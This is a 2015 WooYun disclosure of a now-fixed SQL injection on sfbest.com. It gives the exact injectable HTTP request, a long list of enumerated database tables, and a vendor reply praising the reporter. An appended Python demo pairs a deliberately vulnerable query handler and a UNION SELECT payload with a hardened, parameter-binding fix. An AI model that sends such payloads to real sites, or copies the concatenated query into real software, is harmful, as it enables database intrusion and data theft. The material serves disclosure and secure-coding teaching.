Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0151167

Title: SQL injection on the 顺丰优选 (sfbest.com) main site

Vendor: 顺丰优选

Author: 沦沦

Submitted: 2015-11-01 23:20

Fixed: 2015-11-02 10:14

Published: 2015-11-02 10:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: fixed by the vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-11-01: details sent to the vendor, awaiting vendor handling
2015-11-02: vendor confirmed, details visible to the vendor only
2015-11-02: vendor fixed the vulnerability and chose to publish; details disclosed to the public

Brief description:

As the title says.

Detailed description:

POST /mark/isPlProduct/id/57721*%23/flag/0 HTTP/1.1
Host: www.sfbest.com
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.sfbest.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: http://www.sfbest.com/html/products/58/1800057721.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: siteid=SF_CURRENT_SITE; sf_hash_id_cart=edf560a58f010782; _adwr=212484882%230; _da_z=24490488.1446282243.1.1.ccn=(direct)|csr=(direct)|cmd=(none); _SF_AUTH_HASH_=42f55168062b2d9a; _adwp=212484882.5095872663.1446282242.1446282242.1446386055.2; _adwc=212484882; _da_a=24490488.20730402347158.1446282243.1446282243.1446386055.2; _jzqckmp=1; _SF_USER_HASH_=c3cc178e1d6fbec0; provinceid=6; cityid=76; areaid=692; townid=0; returnUrl=http%3A%2F%2Fwww.sfbest.com%2F; _ems_visitor=1417598425.411598059; DA_UID=-18296926; verifyReturnUrl=http%3A%2F%2Fwww.sfbest.com%2F; _GOOGLE_ISLOG_=1; bdshare_firstime=1446386189921; Hm_lvt_56b4bab8080250772f08703b41839413=1446182916,1446282241,1446386054; Hm_lpvt_56b4bab8080250772f08703b41839413=1446386679; _adwb=212484882; _ga=GA1.2.718868376.1446282243; _gat=1; __xsptplus130=130.2.1446386055.1446387144.5%234%7C%7C%7C%7C%7C%23%23vZMth-PwbBu4Zjf2HfNWStnsknrDJ6Aq%23; Hm_lvt_cceda50ef06cbaf44bdeaabe2470efee=1446182927,1446282243,1446386055; Hm_lpvt_cceda50ef06cbaf44bdeaabe2470efee=1446387144; _sf_tj_cc=ionzuq2fn3c1446282243336.1446282243.1446282243.1446386055.2.6.1446387144; _da_b=24490488.4.10.1446386055; _qzja=1.21731326.1446282242803.1446282242803.1446386055382.1446386141651.1446387147757.0.0.0.5.2; _qzjb=1.1446386055382.4.0.0.0; _qzjc=1; _qzjto=4.1.0; _jzqa=1.2286008647312797200.1446282243.1446282243.1446386055.2; _jzqc=1; _jzqb=1.5.10.1446386055.1


The id parameter is not filtered before it reaches the SQL query. In the request above, the `*` after 57721 is the conventional marker for the injection point (the one sqlmap uses), and `%23` is a URL-encoded `#`, which in MySQL comments out the remainder of the statement. The table listing below was enumerated through this injection point.

Screenshots: 1.png, 2.jpg, 3.jpg, 4.jpg


| gshop_large_customers_activity |
| gshop_large_customers_combo |
| gshop_large_customers_user_list |
| gshop_lc_log |
| gshop_lc_order |
| gshop_lc_order_addr |
| gshop_lc_order_addr_channel |
| gshop_lc_order_paid_info |
| gshop_lc_order_product |
| gshop_marketing_ecard_mobile |
| gshop_member_banners |
| gshop_milk_ip5 |
| gshop_month_sell_modulus |
| gshop_nm_restriction |
| gshop_occupied_number |
| gshop_opencity |
| gshop_opencity_stock |
| gshop_order |
| gshop_order_action_log |
| gshop_order_active |
| gshop_order_active_gift |
| gshop_order_active_product |
| gshop_order_active_statistics |
| gshop_order_card |
| gshop_order_channel |
| gshop_order_coupon_return_detail |
| gshop_order_coupon_return_sync |
| gshop_order_cps |
| gshop_order_delivery |
| gshop_order_ext |
| gshop_order_ext_sfcc |
| gshop_order_history_address |
| gshop_order_invoice |
| gshop_order_log |
| gshop_order_mail |
| gshop_order_package |
| gshop_order_package_detail |
| gshop_order_product |
| gshop_order_product_detail |
| gshop_order_product_money |
| gshop_order_refuse |
| gshop_order_refuse_log |
| gshop_order_send_coupon_log |
| gshop_order_service |
| gshop_order_statistics |
| gshop_order_wxprepare |
| gshop_package_product |
| gshop_package_product_list |
| gshop_package_warehouse |
| gshop_pay_and_settlement |
| gshop_pay_apply |
| gshop_pay_apply_info |
| gshop_pay_detail |
| gshop_pay_list |
| gshop_pay_list_statistics |
| gshop_payment |
| gshop_personal_recommendation |
| gshop_phone_sms |
| gshop_phone_sms_log |
| gshop_platform_department |
| gshop_platform_duty |
| gshop_platform_picture_opt |
| gshop_platform_product_opt |
| gshop_platform_reason |
| gshop_platform_reason_category |
| gshop_platform_return |
| gshop_platform_return_log |
| gshop_platform_return_out |
| gshop_platform_return_product |
| gshop_platform_return_user |
| gshop_platform_shipping_order |
| gshop_pos_product |
| gshop_pos_product_share |
| gshop_pos_saleorder |
| gshop_pos_salepay |
| gshop_ppc |
| gshop_ppc_log |
| gshop_pre_sale |
| gshop_presale_warehouse |
| gshop_present_type |
| gshop_present_use_info |
| gshop_price_protect_info |
| gshop_product |
| gshop_product_activity_flag |
| gshop_product_alias |
| gshop_product_attribute |
| gshop_product_attribute_heike_temp |
| gshop_product_business |
| gshop_product_bussiness_operation_log |
| gshop_product_bussiness_queue |
| gshop_product_change_price_record |
| gshop_product_city |
| gshop_product_converse_recommendation |
| gshop_product_correction |
| gshop_product_cost_price_change |
| gshop_product_detail |
| gshop_product_detail_block_template |
| gshop_product_detail_review |
| gshop_product_detail_template |
| gshop_product_ext_category |
| gshop_product_ext_property |
| gshop_product_ext_property_review |
| gshop_product_finance |
| gshop_product_finance_change |
| gshop_product_giftbag |
| gshop_product_heike |
| gshop_product_importtemp |
| gshop_product_in_price |
| gshop_product_in_price_change |
| gshop_product_in_price_log |
| gshop_product_in_wh |
| gshop_product_in_wh_details |
| gshop_product_link |
| gshop_product_mw_price_log |
| gshop_product_new_tag |
| gshop_product_out_wh |
| gshop_product_out_wh_details |
| gshop_product_outsource |
| gshop_product_outsource_log |
| gshop_product_outsource_picture |
| gshop_product_picture |
| gshop_product_price |
| gshop_product_price_change |
| gshop_product_reduce_price |
| gshop_product_relation |
| gshop_product_sell_detail |
| gshop_product_shipping |
| gshop_product_special |
| gshop_product_special_group |
| gshop_product_stock_set |
| gshop_product_stock_set_review |
| gshop_product_supplier |
| gshop_product_tag |
| gshop_product_temp_review |
| gshop_promotion |
| gshop_promotional_price |
| gshop_promotional_statistics |
| gshop_purchase_order |
| gshop_purchase_order_product |
| gshop_purchase_return_order |
| gshop_purchase_return_product |
| gshop_purchase_return_shipping |
| gshop_qualification_basic |
| gshop_qualification_basic_option |
| gshop_qualification_basic_to_option |
| gshop_qualification_business_attribution |
| gshop_qualification_business_to_basic |
| gshop_ranking |
| gshop_reason |
| gshop_reason_category |
| gshop_receipt |
| gshop_receipt_product |
| gshop_receipt_product_statistics |
| gshop_redressal_inprice |
| gshop_refer_in_price |
| gshop_refund_voucher |
| gshop_refund_voucher_ext |
| gshop_refused_active_statistics |
| gshop_region |
| gshop_region_old |
| gshop_region_warehouse |
| gshop_reissue_invoice |
| gshop_reissue_invoice_order |
| gshop_replenishment_order |
| gshop_replenishment_order_ext |
| gshop_replenishment_order_log |
| gshop_replenishment_product |
| gshop_replenishment_product_detail |
| gshop_replenishment_product_number |
| gshop_replenishment_product_sell |
| gshop_replenishment_product_set |
| gshop_replenishment_product_set_change |
| gshop_replenishment_recommend |
| gshop_replenishment_set |
| gshop_replenishment_set_change |
| gshop_rere_back_product |
| gshop_rere_damaged_product |
| gshop_rere_damaged_reason |
| gshop_rere_receipt |
| gshop_rere_receipt_product |
| gshop_reservation_receiving_date_detail |
| gshop_reservation_receiving_purchase_detail |
| gshop_reservation_receiving_timeframe |
| gshop_return_img |
| gshop_return_product_detail |
| gshop_return_product_info |
| gshop_returns |
| gshop_returns_active |
| gshop_returns_active_gift |
| gshop_returns_active_product |
| gshop_returns_active_statistics |
| gshop_returns_all_statistics |
| gshop_returns_log |
| gshop_returns_news |
| gshop_returns_news_ext |
| gshop_returns_product |
| gshop_returns_product_info |
| gshop_returns_product_info_statistics |
| gshop_returns_product_news |
| gshop_returns_product_statistics |
| gshop_returns_statistics |
| gshop_returns_user |
| gshop_rewrite_order_details |
| gshop_rewrite_returns |
| gshop_routepush |
| gshop_sale_area_template |
| gshop_sale_area_template_detail |
| gshop_score |
| gshop_score_category |
| gshop_score_product |
| gshop_search_price_range |
| gshop_searchengine_keyword |
| gshop_self_activity |
| gshop_self_activity_product |
| gshop_sell_gift_detal |
| gshop_sell_product_detail |
| gshop_sercen_condition |
| gshop_sercen_condition_content |
| gshop_sfv_product_area |
| gshop_sfv_product_area_region |
| gshop_sfv_product_attr |
| gshop_sfv_region |
| gshop_share_mz |
| gshop_shipping |
| gshop_shipping_type |
| gshop_site_warehouse |
| gshop_spoil_order |
| gshop_spoil_order_detail |
| gshop_spoil_reason |
| gshop_spoil_type |
| gshop_statement_of_account |
| gshop_statement_of_account_detail |
| gshop_static_variables |
| gshop_stock |
| gshop_stock_aging |
| gshop_stock_merchant |
| gshop_stock_supplier_mw_change_log |
| gshop_stock_warning |
| gshop_stock_warning_set |
| gshop_storage_rebate_log |
| gshop_subscribe_detail |
| gshop_subscribe_mail |
| gshop_supplier |
| gshop_supplier_apply |
| gshop_supplier_apply_category |
| gshop_supplier_bind |
| gshop_supplier_blacklist |
| gshop_supplier_complaints |
| gshop_supplier_faq |
| gshop_supplier_fms_state |
| gshop_supplier_main |
| gshop_supplier_notice |
| gshop_supplier_notice_relation |
| gshop_supplier_product_stock |
| gshop_supplier_product_upload |
| gshop_supplier_product_upload_img |
| gshop_supplier_retention_money |
| gshop_supplier_retention_money_statistics |
| gshop_supplier_return_address |
| gshop_supplier_stock |
| gshop_swap_product_detail |
| gshop_tag |
| gshop_take |
| gshop_template |
| gshop_template_type |
| gshop_the_bill |
| gshop_timing_tasks |
| gshop_union |
| gshop_union_channel |
| gshop_user_coupon_a |
| gshop_user_service |
| gshop_view_buy_recommendation |
| gshop_warehouse |
| gshop_warehouse_address |
| gshop_warehouse_region |
| gshop_warehouse_region_old |
| gshop_warehouse_temperature |
| gshop_wms_download_order |
| gshop_wms_download_receipt |
| gshop_wms_inventory_balance |
| gshop_wms_inventory_balanceitem |
| gshop_wms_inventory_balanceitem_query_tem |
| gshop_wms_inventory_balanceitem_tem |
| gshop_wms_inventory_trans |
| gshop_wms_is_download |
| gshop_wms_upload_order_status |
| gshop_yaan_product |
| heike_product_redundant |
+----------------------------------------------+

Proof of vulnerability:

See the request and the table listing in the detailed description above.


Fix recommendation:

Filter the input: validate the id parameter as an integer, or bind it as a query parameter instead of concatenating it into the SQL statement.
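As an added example (not code from the report, from 沦沦, or from sfbest.com), the following Python script reproduces the pattern described in the detailed description and in the fix recommendation: a router that maps `/id/<value>` path segments into request parameters, a handler that concatenates `id` straight into the query (the unfiltered pattern the report describes), and a hardened handler that validates and binds it. The database schema, the sample row, the function names and the router behaviour are assumptions; only the table names are taken from the listing on this page. SQLite stands in for MySQL, so the comment terminator in the injected request is `--` rather than the `#` (`%23`) of the original, and table names are read from `sqlite_master` rather than `information_schema.tables`.

```python
import re
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed stand-in for the shop database.

    The table names come from the listing on this page; the columns and the
    single product row are assumed for the demonstration.
    """
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE gshop_product (id INTEGER PRIMARY KEY, name TEXT, is_pl INTEGER);
        CREATE TABLE gshop_order (id INTEGER PRIMARY KEY, user_id INTEGER);
        CREATE TABLE gshop_user_coupon_a (id INTEGER PRIMARY KEY, code TEXT);
        INSERT INTO gshop_product VALUES (57721, 'demo item', 1);
    """)
    return db


def parse_path_params(path):
    """Turn /controller/action/k1/v1/k2/v2 into {'k1': 'v1', 'k2': 'v2'}.

    Every segment is URL-decoded, so %23 arrives at the handler as '#'. This
    is an assumed router; the framework behind www.sfbest.com is not shown.
    """
    segments = [unquote(s) for s in path.strip("/").split("/")]
    kv = segments[2:]                      # drop controller and action
    return dict(zip(kv[0::2], kv[1::2]))


def is_pl_product_vulnerable(db, params):
    """The pattern the report describes: id is dropped into the SQL unfiltered."""
    sql = "SELECT name FROM gshop_product WHERE id = %s AND is_pl = 1" % params["id"]
    return [row[0] for row in db.execute(sql)]


def is_pl_product_fixed(db, params):
    """Hardened handler: accept only a plain integer, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", params["id"]):
        return None                        # reject; a real handler would answer HTTP 400
    sql = "SELECT name FROM gshop_product WHERE id = ? AND is_pl = 1"
    return [row[0] for row in db.execute(sql, (int(params["id"]),))]


# Benign request, as a normal browser session would send it.
BENIGN = "/mark/isPlProduct/id/57721/flag/0"

# Injected request. Where the report's request carries the '*' marker, this one
# carries a UNION that reads table names from sqlite_master (SQLite's analogue of
# MySQL's information_schema.tables). The trailing '--' does what the URL-encoded
# '#' (%23) does in the original: it comments out the rest of the statement.
ATTACK = ("/mark/isPlProduct/id/57721%20UNION%20SELECT%20name%20FROM%20sqlite_master"
          "%20WHERE%20type%3D%27table%27--/flag/0")


def run_demo():
    """Run both handlers against both requests and return the four results."""
    db = make_db()
    return {
        "benign_vulnerable": is_pl_product_vulnerable(db, parse_path_params(BENIGN)),
        "attack_vulnerable": is_pl_product_vulnerable(db, parse_path_params(ATTACK)),
        "benign_fixed": is_pl_product_fixed(db, parse_path_params(BENIGN)),
        "attack_fixed": is_pl_product_fixed(db, parse_path_params(ATTACK)),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, "->", result)
```

Against the vulnerable handler the injected request returns the product name plus every table name in the database, which is how a listing like the one above is obtained; the hardened handler rejects the same request before any SQL runs, while still serving the benign one. Casting and binding together close the hole even if one of them is later removed by mistake.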

Copyright notice: when republishing, please credit the source, 沦沦@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-11-02 09:35

Vendor reply:

The white hat is great~~~~~~ 伦伦, well done~~~~ please message us your contact details!!!!

Latest status:

2015-11-02: The issue has been fixed! Thanks to the white hat~~~~


Vulnerability rating:

Comments

  1. 2015-11-01 23:27 | 玉林嘎 ( regular white hat | Rank:778 vulnerabilities:98 )

    ...

  2. 2015-11-02 08:25 | BMa ( regular white hat | Rank:1811 vulnerabilities:202 )

    Nice work

  3. 2015-11-02 08:48 | 大师兄 ( passer-by | Rank:14 vulnerabilities:6 | checks WooYun every day)

    Awesome

  4. 2015-11-02 08:53 | 一只猿 ( regular white hat | Rank:483 vulnerabilities:90 | hardware and wireless communications research)

    666

  5. 2015-11-02 09:21 | 残冰 ( regular white hat | Rank:187 vulnerabilities:27 | professional brute-forcer for 5000000000000000000000 years)

    Badass, badass, badass

  6. 2015-11-02 09:35 | 泳少 ( regular white hat | Rank:231 vulnerabilities:79 | ★ Once you set out on the road of dreams, even on your knees you ...)

    666666666666

  7. 2015-11-02 10:28 | Me_Fortune ( regular white hat | Rank:220 vulnerabilities:79 | The quieter you are, the more you're able ...)

    Patient...

  8. 2015-11-02 10:29 | an0nym0u5 ( regular white hat | Rank:202 vulnerabilities:32 )

    That was fast

  9. 2015-11-02 10:46 | 大师兄 ( passer-by | Rank:14 vulnerabilities:6 | checks WooYun every day)

    @顺丰优选 the vendor was really quick, kudos

  10. 2015-11-02 10:57 | 顺丰优选 (WooYun vendor)

    Please keep an eye on us! 优选 security~~~ We will send gifts as thanks according to the vulnerabilities reported~!! And for friends in Beijing, our security team will treat you to dinner~~~ KTV~~~~